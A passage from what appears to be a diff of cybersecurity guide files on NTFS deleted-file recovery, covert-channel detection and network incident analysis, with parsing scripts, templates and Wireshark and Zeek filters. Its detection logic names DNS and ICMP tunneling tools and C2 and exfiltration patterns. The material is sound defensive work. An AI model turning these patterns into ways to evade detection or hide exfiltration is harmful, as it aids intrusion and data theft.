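Parsed CSV output usually shows these reasons as text already; a helper like this is mainly useful when working from raw journal records or hex dumps.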
|
||||
|
||||
### Technique 3: $LogFile Transaction Analysis
|
||||
|
||||
The $LogFile stores NTFS transaction records that can reveal file operations even after the USN Journal has been cycled.
|
||||
|
||||
```powershell
|
||||
# Parse $LogFile with LogFileParser
|
||||
LogFileParser.exe -l 'C:\Evidence\$LogFile' -o C:\Output
|
||||
|
||||
# Look for REDO and UNDO operations indicating file deletion:
|
||||
# - DeallocateFileRecordSegment
|
||||
# - DeleteAttribute
|
||||
# - UpdateResidentValue (clearing InUse flag)
|
||||
```
|
||||
|
||||
### Technique 4: MFT Slack Space Analysis
|
||||
|
||||
MFT slack space exists between the end of the used portion of an MFT record and the end of the allocated 1024 bytes. This area may contain remnants of previous file records.
|
||||
|
||||
```python
import json
import struct


def parse_mft_slack(mft_path: str, output_path: str, record_size: int = 1024):
    """Extract and analyze MFT slack space for deleted file remnants."""
    slack_findings = []
    record_num = 0

    with open(mft_path, "rb") as f:
        while True:
            record = f.read(record_size)
            if len(record) < record_size:
                break

            # Only records with a valid FILE signature are examined
            if record[:4] == b"FILE":
                # Used size is a 4-byte little-endian value at offset 0x18
                used_size = struct.unpack("<I", record[0x18:0x1C])[0]

                # Skip implausible sizes from corrupt headers (the header is 0x2A bytes)
                if 0x2A <= used_size < record_size:
                    slack = record[used_size:]
                    # Flag slack whose first bytes contain printable ASCII.
                    # Note: the last two bytes of each 512-byte sector hold
                    # update-sequence fixup values, not original data.
                    if any(0x20 < c < 0x7F for c in slack[:50]):
                        slack_findings.append({
                            "record": record_num,
                            "used_size": used_size,
                            "slack_size": record_size - used_size,
                            "slack_preview": slack[:100].hex(),
                        })

            record_num += 1

    # Persist the findings so they can be reviewed alongside other artifacts
    with open(output_path, "w", encoding="utf-8") as out:
        json.dump(slack_findings, out, indent=2)

    return slack_findings
```
|
||||
|
||||
## Correlation with Supporting Artifacts
|
||||
|
||||
### Cross-Reference MFT with $Recycle.Bin
|
||||
|
||||
```powershell
|
||||
# Parse Recycle Bin with RBCmd
|
||||
RBCmd.exe -d 'C:\Evidence\$Recycle.Bin' --csv C:\Output --csvf recycle_bin.csv
|
||||
|
||||
# Correlate: $I files contain original path and deletion timestamp
|
||||
# Match MFT entry numbers from $R files back to original MFT records
|
||||
```
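
When RBCmd is unavailable, the `$I` metadata files can be read directly. The sketch below assumes the commonly documented `$I` layout (8-byte version, 8-byte original size, 8-byte FILETIME deletion time, then the original path as UTF-16LE, fixed 520 bytes in version 1 and length-prefixed in version 2). The function name `parse_recycle_i` is hypothetical, and the layout should be verified against the evidence before relying on it:

```python
import struct
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_recycle_i(data: bytes) -> dict:
    """Parse the raw bytes of a Recycle Bin $I file (assumed layout, see above)."""
    version, original_size, filetime = struct.unpack_from("<QQQ", data, 0)
    if version == 2:
        # Version 2: 4-byte character count (including the terminator), then the path
        (n_chars,) = struct.unpack_from("<I", data, 24)
        raw_path = data[28:28 + n_chars * 2]
    else:
        # Version 1: fixed 520-byte, null-padded path
        raw_path = data[24:24 + 520]
    path = raw_path.decode("utf-16-le", errors="replace").split("\x00", 1)[0]
    deleted_at = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    return {
        "version": version,
        "original_size": original_size,
        "deleted_at": deleted_at,
        "original_path": path,
    }
```

Reading a file is then `parse_recycle_i(open(path_to_i_file, "rb").read())`; the matching `$R` file shares the same suffix and holds the content.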
|
||||
|
||||
### Cross-Reference MFT with Volume Shadow Copies
|
||||
|
||||
```powershell
|
||||
# List volume shadow copies
|
||||
vssadmin list shadows
|
||||
|
||||
# Mount shadow copies and extract $MFT from each
|
||||
# Compare MFT records across shadow copies to track file changes over time
|
||||
```
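
Once the $MFT from each shadow copy has been parsed to CSV, the comparison can be scripted. A minimal sketch, assuming rows loaded with `csv.DictReader` from MFTECmd output and that the CSV exposes `EntryNumber`, `SequenceNumber`, and `InUse` columns (the column names and the helper `find_deleted_between` are assumptions to check against your MFTECmd version):

```python
def find_deleted_between(old_rows, new_rows):
    """Return records that were in use in the older snapshot but are no longer
    in use (or no longer present with the same sequence number) in the newer one."""
    new_state = {
        (r["EntryNumber"], r["SequenceNumber"]): r for r in new_rows
    }
    deleted = []
    for row in old_rows:
        if row.get("InUse", "").lower() != "true":
            continue  # already deleted in the older snapshot
        current = new_state.get((row["EntryNumber"], row["SequenceNumber"]))
        if current is None or current.get("InUse", "").lower() != "true":
            deleted.append(row)
    return deleted
```

Keying on both entry and sequence number avoids confusing a deleted file with a new file that later reused the same MFT entry.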
|
||||
|
||||
## Forensic Value
|
||||
|
||||
- **Deleted file metadata recovery**: Original filename, path, size, and timestamps
|
||||
- **Timeline reconstruction**: File creation, modification, access, and deletion events
|
||||
- **Timestomping detection**: Comparing $SI vs $FN timestamps
|
||||
- **Data carving guidance**: MFT cluster runs point to file content on disk
|
||||
- **Anti-forensic detection**: Identifying wiped or manipulated MFT records
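
To illustrate the data carving point, the cluster runs of a non-resident `$DATA` attribute can be decoded into (starting cluster, length) pairs. This is a sketch that assumes the run list bytes have already been extracted from the attribute; `decode_data_runs` is a hypothetical helper name:

```python
def decode_data_runs(runlist: bytes) -> list:
    """Decode an NTFS run list into (start_lcn, cluster_count) tuples.

    Each run starts with a header byte: the low nibble is the size of the
    length field, the high nibble is the size of the offset field. Offsets
    are signed and relative to the previous run. A zero header ends the list.
    Sparse runs (offset size 0) are returned with start_lcn set to None.
    """
    runs = []
    pos = 0
    lcn = 0
    while pos < len(runlist) and runlist[pos] != 0:
        header = runlist[pos]
        len_size = header & 0x0F
        off_size = header >> 4
        pos += 1
        length = int.from_bytes(runlist[pos:pos + len_size], "little")
        pos += len_size
        if off_size == 0:
            runs.append((None, length))
        else:
            delta = int.from_bytes(runlist[pos:pos + off_size], "little", signed=True)
            lcn += delta
            runs.append((lcn, length))
        pos += off_size
    return runs
```

Multiplying each starting cluster by the volume's cluster size gives the byte offset to carve from, provided the clusters have not been reallocated since deletion.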
|
||||
|
||||
## References
|
||||
|
||||
- NTFS MFT Advanced Forensic Analysis: https://www.deaddisk.com/posts/ntfs-mft-advanced-forensic-analysis-guide/
|
||||
- MFT Slack Space Forensic Value: https://www.sygnia.co/blog/the-forensic-value-of-mft-slack-space/
|
||||
- MFTECmd Documentation: https://ericzimmerman.github.io/
|
||||
- SANS FOR500: Windows Forensic Analysis
|
||||
@@ -0,0 +1,31 @@
|
||||
# MFT Deleted File Recovery Report Template
|
||||
|
||||
## Case Information
|
||||
| Field | Value |
|-------|-------|
| Case Number | |
| Examiner | |
| Date | |
| Evidence Source | |
| MFT Hash (SHA-256) | |
|
||||
|
||||
## Summary Statistics
|
||||
| Metric | Count |
|--------|-------|
| Total MFT Records | |
| Active Records | |
| Deleted Records | |
| Timestomped Records | |
|
||||
|
||||
## Deleted Files of Interest
|
||||
| Entry # | Filename | Original Path | Size | Created | Modified |
|---------|----------|---------------|------|---------|----------|
| | | | | | |
|
||||
|
||||
## Timestomping Indicators
|
||||
| Entry # | Filename | $SI Created | $FN Created | Delta |
|---------|----------|-------------|-------------|-------|
| | | | | |
|
||||
|
||||
## Conclusion
|
||||
_(Summary of deleted file recovery findings)_
|
||||
@@ -0,0 +1,28 @@
|
||||
# Standards and References - MFT Deleted File Recovery
|
||||
|
||||
## Standards
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques into Incident Response
|
||||
- ISO/IEC 27037: Guidelines for identification, collection, acquisition and preservation of digital evidence
|
||||
- SWGDE Best Practices for Computer Forensics
|
||||
|
||||
## Key Technical References
|
||||
- NTFS Documentation (Microsoft): File system internals and MFT structure
|
||||
- MFTECmd by Eric Zimmerman: Primary parsing tool for $MFT, $J, $Boot, $SDS, and $I30 ($LogFile requires a separate parser)
|
||||
- analyzeMFT (Python): Open-source MFT parser for cross-platform analysis
|
||||
- ntfstool (GitHub): Forensics tool for NTFS parsing, MFT, BitLocker, deleted files
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
- T1070.004 - Indicator Removal: File Deletion
|
||||
- T1070.006 - Indicator Removal: Timestomp
|
||||
- T1485 - Data Destruction
|
||||
- T1561 - Disk Wipe
|
||||
|
||||
## NTFS Specifications
|
||||
- MFT Record Size: 1024 bytes (default)
|
||||
- MFT Entry 0: $MFT (self-reference)
|
||||
- MFT Entry 1: $MFTMirr (mirror of first 4 entries)
|
||||
- MFT Entry 2: $LogFile (transaction log)
|
||||
- MFT Entry 5: Root directory
|
||||
- MFT Entry 6: $Bitmap (cluster allocation)
|
||||
- MFT Entry 8: $BadClus (bad cluster list)
|
||||
- MFT Entry 11: $Extend (extended metadata)
|
||||
@@ -0,0 +1,46 @@
|
||||
# Workflows - MFT Deleted File Recovery
|
||||
|
||||
## Workflow 1: Basic Deleted File Discovery
|
||||
```
Extract $MFT from forensic image
    |
Parse with MFTECmd to CSV
    |
Filter for InUse = False (deleted records)
    |
Analyze ParentPath, FileName, FileSize
    |
Cross-reference with USN Journal for deletion timestamps
    |
Document findings with original paths and timestamps
```
|
||||
|
||||
## Workflow 2: MFT Slack Space Recovery
|
||||
```
Extract raw $MFT binary
    |
Parse each 1024-byte record
    |
Compare used_size vs allocated_size (1024)
    |
Extract slack bytes between used and allocated
    |
Search for attribute headers (0x10, 0x30, 0x80)
    |
Reconstruct partial file metadata from slack data
```
|
||||
|
||||
## Workflow 3: Timeline Reconstruction
|
||||
```
Parse $MFT for all timestamps ($SI and $FN)
    |
Parse $J (USN Journal) for change records
    |
Parse $LogFile for transaction records
    |
Merge into unified timeline
    |
Identify file creation, modification, deletion sequences
    |
Flag timestomping indicators ($SI Created < $FN Created)
```
|
||||
@@ -0,0 +1,118 @@
|
||||
#!/usr/bin/env python3
"""
MFT Deleted File Recovery Analyzer

Parses MFT CSV output from MFTECmd to identify deleted files,
detect timestomping, and generate recovery reports.
"""

import csv
import json
import os
import re
import sys
from collections import defaultdict
from datetime import datetime


def parse_timestamp(value: str) -> datetime:
    """Parse a CSV timestamp string into a datetime.

    Fractional seconds are trimmed to six digits because
    datetime.fromisoformat() rejects longer fractions before Python 3.11.
    """
    value = value.strip().replace("Z", "+00:00")
    value = re.sub(r"(\.\d{6})\d+", r"\1", value)
    return datetime.fromisoformat(value)


class MFTDeletedFileAnalyzer:
    """Analyze MFTECmd CSV output for deleted file recovery."""

    def __init__(self, mft_csv_path: str, output_dir: str):
        self.mft_csv_path = mft_csv_path
        self.output_dir = output_dir
        os.makedirs(output_dir, exist_ok=True)
        self.deleted_files = []
        self.timestomped_files = []
        self.all_records = []

    def parse_csv(self):
        """Parse MFTECmd CSV output."""
        with open(self.mft_csv_path, "r", encoding="utf-8-sig") as f:
            reader = csv.DictReader(f)
            for row in reader:
                self.all_records.append(row)
                # Records with InUse = False are deleted (unallocated) entries
                if row.get("InUse", "").lower() == "false":
                    self.deleted_files.append(row)

    def detect_timestomping(self):
        """Identify files with timestomping indicators."""
        for row in self.all_records:
            si_created = row.get("Created0x10", "")
            fn_created = row.get("Created0x30", "")
            if si_created and fn_created and si_created != fn_created:
                try:
                    si_dt = parse_timestamp(si_created)
                    fn_dt = parse_timestamp(fn_created)
                    # $SI creation earlier than $FN creation is a common indicator
                    if si_dt < fn_dt:
                        self.timestomped_files.append({
                            "entry_number": row.get("EntryNumber", ""),
                            "filename": row.get("FileName", ""),
                            "parent_path": row.get("ParentPath", ""),
                            "si_created": si_created,
                            "fn_created": fn_created,
                            "delta_seconds": (fn_dt - si_dt).total_seconds()
                        })
                except (ValueError, TypeError):
                    continue

    def analyze_deleted_by_extension(self) -> dict:
        """Categorize deleted files by extension."""
        by_ext = defaultdict(list)
        for record in self.deleted_files:
            # Treat a missing or empty Extension column as NO_EXT
            ext = (record.get("Extension") or "NO_EXT").upper()
            by_ext[ext].append({
                "filename": record.get("FileName", ""),
                "parent_path": record.get("ParentPath", ""),
                "file_size": record.get("FileSize", ""),
                "created": record.get("Created0x10", ""),
                "modified": record.get("LastModified0x10", "")
            })
        return dict(by_ext)

    def generate_report(self) -> str:
        """Generate comprehensive analysis report."""
        self.parse_csv()
        self.detect_timestomping()
        ext_analysis = self.analyze_deleted_by_extension()

        report = {
            "analysis_timestamp": datetime.now().isoformat(),
            "source_file": self.mft_csv_path,
            "total_records": len(self.all_records),
            "deleted_records": len(self.deleted_files),
            "timestomped_records": len(self.timestomped_files),
            "deleted_by_extension": {k: len(v) for k, v in ext_analysis.items()},
            "timestomping_details": self.timestomped_files[:50],
            "notable_deleted_files": [
                {
                    "filename": r.get("FileName", ""),
                    "parent_path": r.get("ParentPath", ""),
                    "file_size": r.get("FileSize", ""),
                    "entry_number": r.get("EntryNumber", "")
                }
                for r in self.deleted_files[:100]
            ]
        }

        report_path = os.path.join(self.output_dir, "mft_deleted_analysis.json")
        with open(report_path, "w") as f:
            json.dump(report, f, indent=2)

        print(f"[*] Total MFT records: {report['total_records']}")
        print(f"[*] Deleted records: {report['deleted_records']}")
        print(f"[*] Timestomped records: {report['timestomped_records']}")
        print(f"[*] Report saved to: {report_path}")
        return report_path


def main():
    if len(sys.argv) < 3:
        print("Usage: python process.py <mft_csv_path> <output_dir>")
        sys.exit(1)

    analyzer = MFTDeletedFileAnalyzer(sys.argv[1], sys.argv[2])
    analyzer.generate_report()


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,185 @@
|
||||
---
|
||||
name: analyzing-network-covert-channels-in-malware
|
||||
description: Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration, steganographic HTTP, and protocol abuse for C2 and data exfiltration.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [covert-channels, dns-tunneling, icmp-exfiltration, malware-analysis, network-forensics, c2-detection, data-exfiltration]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Network Covert Channels in Malware
|
||||
|
||||
## Overview
|
||||
|
||||
Malware uses covert channels to disguise C2 communication and data exfiltration within legitimate-looking network traffic. DNS tunneling encodes data in DNS queries and responses (used by tools like iodine and dnscat2, and by malware families such as FrameworkPOS). ICMP tunneling hides data in echo request/reply payloads (icmpsh, ptunnel). HTTP covert channels embed C2 data in headers, cookies, or steganographic images. Protocol abuse exploits protocols that firewalls already allow in order to bypass filtering. Published ML-based detectors report recall above 99% for DNS tunneling on benchmark datasets, though low-throughput exfiltration remains hard to detect. Palo Alto Networks Unit 42 documented three DNS tunneling campaigns (TrkCdn, SpamTracker, SecShow) in 2024, showing the technique's continued prevalence.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `scapy`, `dpkt`, `dnslib`
|
||||
- Wireshark/tshark for PCAP analysis
|
||||
- Zeek (formerly Bro) for network monitoring
|
||||
- DNS query logging infrastructure
|
||||
- Understanding of DNS, ICMP, HTTP protocols at packet level
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: DNS Tunneling Detection
|
||||
|
||||
```python
#!/usr/bin/env python3
"""Detect DNS tunneling and covert channels in network traffic."""
import sys
import math
from collections import Counter, defaultdict

try:
    from scapy.all import rdpcap, DNS, DNSQR, IP, ICMP
except ImportError:
    print("pip install scapy")
    sys.exit(1)


def entropy(data):
    """Shannon entropy (bits per character) of a string."""
    if not data:
        return 0
    freq = Counter(data)
    length = len(data)
    return -sum((c/length) * math.log2(c/length) for c in freq.values())


def analyze_dns_tunneling(pcap_path):
    """Detect DNS tunneling indicators in PCAP."""
    packets = rdpcap(pcap_path)
    domain_stats = defaultdict(lambda: {
        "queries": 0, "total_qname_len": 0, "subdomain_lengths": [],
        "query_types": Counter(), "unique_subdomains": set(),
    })

    for pkt in packets:
        # Count queries only; responses repeat the question section
        if pkt.haslayer(DNS) and pkt.haslayer(DNSQR) and pkt[DNS].qr == 0:
            qname = pkt[DNSQR].qname.decode('utf-8', errors='replace').rstrip('.')
            qtype = pkt[DNSQR].qtype

            parts = qname.split('.')
            if len(parts) >= 3:
                # Naive split: the last two labels are treated as the base domain,
                # which misgroups multi-label suffixes such as co.uk
                base_domain = '.'.join(parts[-2:])
                subdomain = '.'.join(parts[:-2])

                stats = domain_stats[base_domain]
                stats["queries"] += 1
                stats["total_qname_len"] += len(qname)
                stats["subdomain_lengths"].append(len(subdomain))
                stats["query_types"][qtype] += 1
                stats["unique_subdomains"].add(subdomain)

    # Score domains for tunneling indicators
    suspicious = []
    for domain, stats in domain_stats.items():
        if stats["queries"] < 5:
            continue

        avg_subdomain_len = (sum(stats["subdomain_lengths"]) /
                             len(stats["subdomain_lengths"]))
        unique_ratio = len(stats["unique_subdomains"]) / stats["queries"]

        # Calculate subdomain entropy
        all_subdomains = ''.join(stats["unique_subdomains"])
        sub_entropy = entropy(all_subdomains)

        score = 0
        reasons = []

        if avg_subdomain_len > 30:
            score += 30
            reasons.append(f"Long subdomains (avg {avg_subdomain_len:.0f} chars)")
        if unique_ratio > 0.9:
            score += 25
            reasons.append(f"High uniqueness ({unique_ratio:.2%})")
        if sub_entropy > 4.0:
            score += 25
            reasons.append(f"High entropy ({sub_entropy:.2f})")
        if stats["query_types"].get(16, 0) > 10:  # TXT records
            score += 20
            reasons.append(f"Many TXT queries ({stats['query_types'][16]})")

        if score >= 50:
            suspicious.append({
                "domain": domain,
                "score": score,
                "queries": stats["queries"],
                "avg_subdomain_length": round(avg_subdomain_len, 1),
                "unique_subdomains": len(stats["unique_subdomains"]),
                "subdomain_entropy": round(sub_entropy, 2),
                "reasons": reasons,
            })

    return sorted(suspicious, key=lambda x: -x["score"])


def analyze_icmp_tunneling(pcap_path):
    """Detect ICMP tunneling in PCAP."""
    packets = rdpcap(pcap_path)
    icmp_stats = defaultdict(lambda: {"count": 0, "payload_sizes": [], "payloads": []})

    for pkt in packets:
        if pkt.haslayer(ICMP) and pkt.haslayer(IP):
            src = pkt[IP].src
            dst = pkt[IP].dst
            key = f"{src}->{dst}"

            payload = bytes(pkt[ICMP].payload)
            icmp_stats[key]["count"] += 1
            icmp_stats[key]["payload_sizes"].append(len(payload))
            # Keep a sample of oversized payloads for manual review
            if len(payload) > 64:
                icmp_stats[key]["payloads"].append(payload[:100])

    suspicious = []
    for flow, stats in icmp_stats.items():
        if stats["count"] < 5:
            continue
        avg_size = sum(stats["payload_sizes"]) / len(stats["payload_sizes"])
        if avg_size > 64 or stats["count"] > 100:
            suspicious.append({
                "flow": flow,
                "packets": stats["count"],
                "avg_payload_size": round(avg_size, 1),
                "reason": "Large/frequent ICMP payloads suggest tunneling",
            })

    return suspicious


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <pcap_file>")
        sys.exit(1)

    print("[+] DNS Tunneling Analysis")
    dns_results = analyze_dns_tunneling(sys.argv[1])
    for r in dns_results:
        print(f"  {r['domain']} (score: {r['score']})")
        for reason in r['reasons']:
            print(f"    - {reason}")

    print("\n[+] ICMP Tunneling Analysis")
    icmp_results = analyze_icmp_tunneling(sys.argv[1])
    for r in icmp_results:
        print(f"  {r['flow']}: {r['reason']}")
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- DNS tunneling detected via entropy, subdomain length, and query volume analysis
|
||||
- ICMP covert channels identified through payload size anomalies
|
||||
- Tunneling domains distinguished from legitimate CDN/cloud traffic
|
||||
- Data exfiltration volume estimated from captured traffic
|
||||
- C2 communication patterns and beaconing intervals extracted
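
For the exfiltration volume criterion, a rough upper bound can be derived from the subdomain labels of queries to a flagged domain. This is only a sketch: the encoding density (`bits_per_char`, defaulting to 5 for base32) is an assumption, and the helper name `estimate_dns_exfil_bytes` is hypothetical:

```python
def estimate_dns_exfil_bytes(qnames, base_domain, bits_per_char=5.0):
    """Estimate the payload bytes carried in subdomain labels of a tunneling domain.

    Duplicate query names are counted once, since retransmissions carry no new data.
    """
    suffix = "." + base_domain.lower().rstrip(".")
    seen = set()
    encoded_chars = 0
    for qname in qnames:
        name = qname.lower().rstrip(".")
        if not name.endswith(suffix) or name in seen:
            continue
        seen.add(name)
        subdomain = name[:-len(suffix)]
        # Dots only separate labels; they carry no payload
        encoded_chars += len(subdomain.replace(".", ""))
    return int(encoded_chars * bits_per_char / 8)
```

Set `bits_per_char` to 4 for hex-encoded payloads or 6 for base64-style alphabets; the true figure is lower when the malware adds sequence numbers or padding.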
|
||||
|
||||
## References
|
||||
|
||||
- [Palo Alto Unit42 - DNS Tunneling Campaigns](https://unit42.paloaltonetworks.com/three-dns-tunneling-campaigns/)
|
||||
- [Elastic - Detecting Covert Data Exfiltration](https://www.elastic.co/blog/elastic-security-detecting-covert-data-exfiltration)
|
||||
- [Vectra AI - ICMP Tunnel Detection](https://www.vectra.ai/detections/icmp-tunnel)
|
||||
- [MITRE ATT&CK T1071 - Application Layer Protocol](https://attack.mitre.org/techniques/T1071/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|-------|-------|
| SHA-256 | |
| File Type | |
| Analysis Date | |
| Analyst | |
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|---------|----------|---------|
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
| Type | Value | Context |
|------|-------|---------|
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-network-covert-channels-in-malware
|
||||
|
||||
## Primary Workflow
|
||||
```
|
||||
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
|
||||
|
|
||||
v
|
||||
[Report Generation]
|
||||
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,252 @@
|
||||
---
|
||||
name: analyzing-network-traffic-for-incidents
|
||||
description: >
|
||||
Analyzes network traffic captures and flow data to identify adversary activity during
|
||||
security incidents, including command-and-control communications, lateral movement,
|
||||
data exfiltration, and exploitation attempts. Uses Wireshark, Zeek, and NetFlow
|
||||
analysis techniques. Activates for requests involving network traffic analysis,
|
||||
packet capture investigation, PCAP analysis, network forensics, C2 traffic detection,
|
||||
or exfiltration detection.
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [network-forensics, PCAP-analysis, Wireshark, Zeek, traffic-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Network Traffic for Incidents
|
||||
|
||||
## When to Use
|
||||
|
||||
- SIEM alerts on anomalous network traffic patterns requiring deeper investigation
|
||||
- C2 beaconing is suspected and needs confirmation through packet-level analysis
|
||||
- Data exfiltration volume or destination must be quantified from network evidence
|
||||
- Lateral movement between systems needs to be traced through network connections
|
||||
- An IDS/IPS alert requires packet-level validation to confirm or dismiss
|
||||
|
||||
**Do not use** for host-based forensic analysis (process execution, file system artifacts); use endpoint forensics tools instead.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Full packet capture (PCAP) infrastructure or on-demand capture capability (network tap, SPAN port)
|
||||
- Wireshark installed on the analysis workstation with appropriate display filters knowledge
|
||||
- Zeek (formerly Bro) deployed for network metadata generation (conn.log, dns.log, http.log, ssl.log)
|
||||
- NetFlow/IPFIX collection from network devices for traffic flow analysis
|
||||
- Network architecture diagram showing VLAN layout, firewall placement, and monitoring points
|
||||
- Threat intelligence feeds for correlating observed network indicators
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Capture or Acquire Network Traffic
|
||||
|
||||
Obtain the relevant traffic data for the investigation:
|
||||
|
||||
**Live Capture (if incident is active):**
|
||||
```bash
|
||||
# Capture on specific interface filtering by host
|
||||
tcpdump -i eth0 -w capture.pcap host 10.1.5.42
|
||||
|
||||
# Capture C2 traffic to specific external IP
|
||||
tcpdump -i eth0 -w c2_traffic.pcap host 185.220.101.42
|
||||
|
||||
# Capture with rotation (1GB files, keep 10)
|
||||
tcpdump -i eth0 -w capture.pcap -C 1000 -W 10
|
||||
```
|
||||
|
||||
**From Existing Infrastructure:**
|
||||
- Export PCAP from full packet capture appliance (Arkime/Moloch, ExtraHop, Corelight)
|
||||
- Pull Zeek logs from the Zeek cluster for the investigation timeframe
|
||||
- Export NetFlow data from network devices for high-level traffic analysis
|
||||
|
||||
### Step 2: Identify C2 Communications
|
||||
|
||||
Detect command-and-control traffic patterns:
|
||||
|
||||
**Beaconing Detection (Zeek conn.log):**
|
||||
```bash
|
||||
# Extract connections to the suspected C2 range, ordered by time, to inspect intervals
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p duration orig_bytes resp_bytes \
    | awk '$3 ~ /^185\.220\./' | sort -n
|
||||
```
|
||||
|
||||
**Wireshark Beacon Analysis:**
|
||||
```
|
||||
# Filter for traffic to suspected C2 IP
|
||||
ip.addr == 185.220.101.42
|
||||
|
||||
# Filter HTTPS traffic to non-standard ports
|
||||
tls && !(tcp.port == 443)
|
||||
|
||||
# Filter DNS queries for suspicious domains
|
||||
dns.qry.name contains "evil" or dns.qry.name matches "^[a-z0-9]{32}\."
|
||||
|
||||
# Filter HTTP POST (common C2 check-in method)
|
||||
http.request.method == "POST" && ip.dst == 185.220.101.42
|
||||
```
|
||||
|
||||
Beaconing characteristics to identify:
|
||||
- Regular time intervals between connections (e.g., every 60 seconds with 10-15% jitter)
|
||||
- Consistent packet sizes in requests and responses
|
||||
- HTTPS to external IPs not associated with legitimate CDNs or services
|
||||
- DNS queries with high entropy subdomains (DNS tunneling indicator)
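
The interval regularity described above can be quantified from connection timestamps, for example the `ts` column of Zeek's conn.log for one source/destination pair. A minimal sketch, using the coefficient of variation of the inter-connection gaps as a jitter proxy (the function name `beacon_stats` is hypothetical, and any alerting threshold is an analyst choice rather than a standard):

```python
from statistics import mean, pstdev


def beacon_stats(timestamps):
    """Summarize timing regularity for one source/destination pair.

    Returns the mean interval in seconds and the jitter, defined here as
    the standard deviation of the intervals divided by their mean.
    """
    ts = sorted(timestamps)
    deltas = [later - earlier for earlier, later in zip(ts, ts[1:])]
    if len(deltas) < 2:
        return {"connections": len(ts), "mean_interval": None, "jitter": None}
    avg = mean(deltas)
    jitter = pstdev(deltas) / avg if avg else None
    return {"connections": len(ts), "mean_interval": avg, "jitter": jitter}
```

A jitter value close to zero over many connections suggests automated check-ins, while interactive browsing tends to produce much larger values.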
|
||||
|
||||
### Step 3: Analyze Lateral Movement Traffic
|
||||
|
||||
Trace adversary movement between internal systems:
|
||||
|
||||
```
|
||||
Key protocols for lateral movement detection:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
SMB (TCP 445): PsExec, file share access, ransomware propagation
|
||||
RDP (TCP 3389): Remote desktop sessions
|
||||
WinRM (TCP 5985/5986): PowerShell remoting
|
||||
WMI (TCP 135): Remote command execution
|
||||
SSH (TCP 22): Linux lateral movement
|
||||
DCE/RPC (TCP 135): DCOM-based lateral movement
|
||||
```
|
||||
|
||||
**Wireshark Filters for Lateral Movement:**
|
||||
```
|
||||
# SMB lateral movement
|
||||
smb2 && ip.src == 10.1.5.42 && ip.dst != 10.1.5.42
|
||||
|
||||
# RDP connections from compromised host
|
||||
tcp.dstport == 3389 && ip.src == 10.1.5.42
|
||||
|
||||
# Kerberos ticket requests (potential pass-the-ticket)
|
||||
kerberos.msg_type == 12 && ip.src == 10.1.5.42
|
||||
|
||||
# NTLM authentication (potential pass-the-hash)
|
||||
ntlmssp.auth.username && ip.src == 10.1.5.42
|
||||
```
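
Beyond per-packet filters, lateral movement often shows up as one host reaching many internal peers over administrative ports. The sketch below assumes connection tuples of `(source, destination, destination_port)` already exported from Zeek or NetFlow; the port table mirrors the protocol list above, and `lateral_fanout` and its `min_targets` threshold are hypothetical:

```python
from collections import defaultdict

# Administrative ports from the protocol list above
LATERAL_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM", 135: "WMI/DCOM", 22: "SSH"}


def lateral_fanout(conns, min_targets=3):
    """Return sources that contacted at least `min_targets` distinct hosts
    on administrative ports, mapped to the sorted list of those hosts."""
    targets = defaultdict(set)
    for src, dst, port in conns:
        if port in LATERAL_PORTS and src != dst:
            targets[src].add(dst)
    return {
        src: sorted(dsts)
        for src, dsts in targets.items()
        if len(dsts) >= min_targets
    }
```

Management servers and vulnerability scanners legitimately show high fan-out, so results should be compared against a known-good baseline.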
|
||||
|
||||
### Step 4: Detect Data Exfiltration
|
||||
|
||||
Identify unauthorized data transfers leaving the network:
|
||||
|
||||
```bash
# Identify large outbound transfers (>100 MB sent by the originator) in Zeek conn.log
cat conn.log | zeek-cut ts id.orig_h id.resp_h id.resp_p orig_bytes \
    | awk '$5 > 100000000' | sort -t$'\t' -k5,5nr

# DNS tunneling detection (high volume of TXT queries per registered domain)
cat dns.log | zeek-cut query qtype_name | grep -w TXT | cut -f1 \
    | rev | cut -d. -f1,2 | rev | sort | uniq -c | sort -rn | head

# Unusual protocol usage (large ICMP payloads can indicate tunneling)
cat conn.log | zeek-cut proto id.resp_p orig_bytes | awk '$1 == "icmp" && $3 > 1000'
```
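
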